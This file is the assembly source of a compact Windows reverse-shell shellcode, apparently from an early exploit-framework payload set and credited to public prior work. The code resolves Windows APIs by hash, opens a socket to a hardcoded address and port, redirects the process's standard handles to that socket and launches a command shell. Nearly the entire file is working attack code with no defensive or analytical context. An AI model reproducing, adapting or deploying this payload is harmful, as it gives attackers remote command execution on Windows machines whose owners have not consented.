;
; win32_reverse_std_handle
; 234 bytes
; 
; Optimized win32 (NT/2K/XP/2003) reverse using
; direct STD handle updating and a call to system
; rather than using CreateProcessA and waiting.
; Based largely on Matthieu Suiche's implementation
; which can be found here:
;
; http://archives.neohapsis.com/archives/bugtraq/2005-08/0209.html
;
; and originally on Brett Moore's approach here:
;
; http://lists.virus.org/darklab-0312/msg00004.html
;
; Can probably have a few more bytes squeezed out, do it up!
;
; skape
; mmiller@hick.org
;
GLOBAL _WinMain
BITS   32

section text

_WinMain:

entry:
	cld

find_kernel32:
	xor   eax, eax
	mov   eax, [fs:eax+0x30]
	mov   eax, [eax + 0xc]
	mov   esi, [eax + 0x1c]
	lodsd
	mov   ebp, [eax + 0x8]
get_eip:
	db    0xe8, 0xff, 0xff, 0xff, 0xff, 0xc3
	jmp   short startup

call_function:
	pushad
	mov   eax, [ebp + 0x3c]
	mov   edx, [ebp + eax + 0x78]
	add   edx, ebp
	mov   ebx, [edx + 0x20]
	add   ebx, ebp
	xor   ecx, ecx
enum_exports:
	inc   ecx
	mov   esi, [ebx + ecx*4]
	add   esi, ebp
	lodsd
	xchg  edi, eax
	lodsd
	add   edi, eax
	cmp   edi, [esp + 0x24]
	jnz   enum_exports
export_found:
	mov   ebx, [edx + 0x24]
	add   ebx, ebp
	mov   cx, [ebx + ecx*2]
	mov   ebx, [edx + 0x1c]
	add   ebx, ebp
	add   ebp, [ebx + ecx*4]
	mov   [esp + 0x1c], ebp
	popad
	ret

startup:
	pop   ebx
	add   ebx, byte 0x3

resolve_load_library:
	push  0xd6c3d898
	call  ebx
	xchg  eax, edi

resolve_exit_process:
	push  0xd7d8ea95
	call  ebx
	xchg  ebp, eax

load_ws2_32:
	xor   esi, esi
	push  si
	push  word 0x3233
	push  0x5f327377
	push  esp
	call  edi

save_context:
	push  ebp
	push  edi
	mov   edi, esp

swap_base:
	xchg  ebp, eax

wsa_startup:
	push  0xc7b3b4cb
	call  ebx

	sub   sp, 0x190
	push  esp
	push  byte 0x2
	call  eax

wsa_socket:
	push  0xb8acb6c6
	call  ebx

	push  esi
	push  esi
	push  esi
	push  esi
	inc   esi
	push  esi
	inc   esi
	push  esi
	call  eax

set_std_handles:
	push  edi
	mov   ecx, [fs:esi+0x2e]
	mov   edi, [ecx + 0x10]
	add   edi, byte 0x18
	stosd
	stosd
	stosd
	pop   edi

connect:
	push  dword 0x01f4a8c0
	push  word 0x5c11
	push  si
	mov   esi, esp

	push  byte 0x10
	push  esi
	push  eax

	push  0x6ee2d2c8
	call  ebx
	pop   edx
	call  eax

system:
	push  ax
	push  word 0x7472
	push  0x6376736d
	push  esp
	call  [edi]
	xchg  eax, ebp

	push  0xe873e6d8
	call  ebx

	sub   dword [esp], 0xe80f7975
	push  esp
	call  eax

exit_process
	call  [edi + 0x4]